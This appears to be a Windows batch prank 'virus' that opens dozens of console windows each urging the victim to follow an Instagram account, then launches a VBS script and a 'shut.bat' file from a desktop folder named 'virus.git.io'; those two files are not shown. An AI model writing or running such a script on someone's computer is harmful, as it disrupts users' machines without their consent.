@echo off
color 4
timeout /t 6

start  echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start echo FOLLLOW ME ON INSTAGRAM USER NAME jumli_d
start "" "C:\Users\R R S COMPUTER\Desktop\virus.git.io\next.vbs"
call "C:\Users\R R S COMPUTER\Desktop\virus.git.io\shut.bat"
pause